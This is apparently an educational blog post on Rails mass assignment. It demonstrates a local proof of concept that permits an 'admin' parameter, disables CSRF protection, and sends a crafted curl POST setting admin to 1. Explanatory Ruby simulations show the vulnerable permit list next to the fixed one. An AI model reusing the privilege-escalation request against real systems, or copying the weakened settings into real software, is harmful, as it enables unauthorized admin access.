Simple Ruby on Rails Mass Assignment Testing Part II : Through Post Request


Continuing from Part I, I am going to show how an attacker can exploit a mass-assignment vulnerability through an unauthorized POST request.

Open your Rails application and make sure the users_controller looks like this:

  def user_params
    params.require(:user).permit(:name, :admin)
  end

So the admin parameter is permitted.

Now go to your application.rb file and comment out this line:

class ApplicationController < ActionController::Base
  # Prevent CSRF attacks by raising an exception.
  # For APIs, you may want to use :null_session instead.
  #protect_from_forgery with: :exception
end

Rails has a default protection against CSRF attacks: your application won't accept any POST request that lacks a site-generated authenticity token. (It is good to know that you are protected!) DON'T ever comment out this line in production. We are ignoring this protection layer only for a proof of concept.
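To make the effect of that commented-out line concrete, here is an added, simplified stand-in for what protect_from_forgery does on a POST (example code written for this post, not Rails' own implementation; real Rails tokens are additionally masked per request and read from the session store and a header, which is skipped here). The session hash, the handle_post function and the forgery_protection flag are assumptions for the illustration:

```ruby
require 'securerandom'

# Raised when a POST arrives without a valid token, like Rails'
# ActionController::InvalidAuthenticityToken.
class InvalidAuthenticityToken < StandardError; end

# The server creates one random token per session and embeds it in every
# form it renders, so only requests that came from its own pages carry it.
def issue_csrf_token(session)
  session[:csrf_token] ||= SecureRandom.hex(32)
end

# Constant-time comparison so the check does not leak how many bytes matched.
def secure_compare(a, b)
  return false unless a.bytesize == b.bytesize
  a.bytes.zip(b.bytes).reduce(0) { |acc, (x, y)| acc | (x ^ y) }.zero?
end

# Stand-in for verify_authenticity_token: reject the request unless the
# submitted token matches the one stored in the session.
def verify_authenticity_token!(session, submitted)
  expected = session[:csrf_token]
  if expected.nil? || submitted.nil? || !secure_compare(expected, submitted)
    raise InvalidAuthenticityToken
  end
  true
end

# A POST handler. With forgery_protection: true it behaves like the controller
# with protect_from_forgery in place; false models the commented-out line.
def handle_post(session, params, forgery_protection: true)
  verify_authenticity_token!(session, params['authenticity_token']) if forgery_protection
  :created
end

if __FILE__ == $PROGRAM_NAME
  session = {}
  token = issue_csrf_token(session)

  # A form submitted from one of the application's own pages carries the token.
  puts handle_post(session, { 'authenticity_token' => token })

  # A request built elsewhere (for example with curl) has no token to send.
  begin
    handle_post(session, {})
  rescue InvalidAuthenticityToken
    puts 'rejected: no authenticity token'
  end

  # With protection disabled the same token-less request goes through.
  puts handle_post(session, {}, forgery_protection: false)
end
```

The point is that the curl request further down only works because this check has been switched off; with it enabled, the request is rejected before the controller ever looks at the parameters.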

Now open up your terminal and run:

 curl --request POST --globoff 'http://localhost:3000/users' -d 'user[name]=massass&user[admin]=1'

We send a POST request through curl and set admin to 1. Open the application in the browser, and you will see:
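The following added example (written for this post, not code from the Rails project) traces what happens to that curl body on the server side and puts the vulnerable permit list from the users_controller above beside the fixed one. The parse_nested_query and permit functions are simplified stand-ins for Rack's query parsing and ActionController::Parameters, and the User class is a toy model; all of them are assumptions for the illustration:

```ruby
require 'cgi'

# Constructed request body, identical to the one sent with curl above.
ATTACK_BODY = 'user[name]=massass&user[admin]=1'.freeze

# Minimal stand-in for Rack's nested query parsing: "user[name]=x" becomes
# { "user" => { "name" => "x" } }. One level of nesting is enough here.
def parse_nested_query(body)
  body.split('&').each_with_object({}) do |pair, params|
    raw_key, raw_value = pair.split('=', 2)
    key = CGI.unescape(raw_key.to_s)
    value = CGI.unescape(raw_value.to_s)
    if (m = key.match(/\A(\w+)\[(\w+)\]\z/))
      (params[m[1]] ||= {})[m[2]] = value
    else
      params[key] = value
    end
  end
end

# Stand-in for params.require(...).permit(...): keep only the whitelisted
# keys of the required sub-hash and silently drop everything else.
def permit(params, required:, permitted:)
  sub = params.fetch(required.to_s) { raise ArgumentError, "param is missing: #{required}" }
  allowed = permitted.map(&:to_s)
  sub.select { |key, _| allowed.include?(key) }
end

# Toy model with a mass-assignment style constructor, like User.new(attrs).
class User
  attr_reader :name, :admin

  def initialize(attrs)
    @name  = attrs['name']
    @admin = attrs['admin'] == '1' # Rails casts "1" to true for a boolean column
  end
end

# The vulnerable user_params from the post: :admin is in the permit list.
def vulnerable_user_params(params)
  permit(params, required: :user, permitted: [:name, :admin])
end

# The fix: only permit attributes an end user is allowed to set; admin stays
# out of the list and can only be changed by server-side code.
def safe_user_params(params)
  permit(params, required: :user, permitted: [:name])
end

# Models UsersController#create: parse the body, filter it, build the record.
def create_user(params_filter, body)
  User.new(params_filter.call(parse_nested_query(body)))
end

if __FILE__ == $PROGRAM_NAME
  attacker = create_user(method(:vulnerable_user_params), ATTACK_BODY)
  puts "vulnerable: name=#{attacker.name} admin=#{attacker.admin}"
  fixed = create_user(method(:safe_user_params), ATTACK_BODY)
  puts "fixed:      name=#{fixed.name} admin=#{fixed.admin}"
end
```

With the vulnerable permit list the crafted body yields a user with admin set to true; with the fixed list the same body still creates the user, but the admin key is dropped before it reaches the model.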

This concludes today’s post.
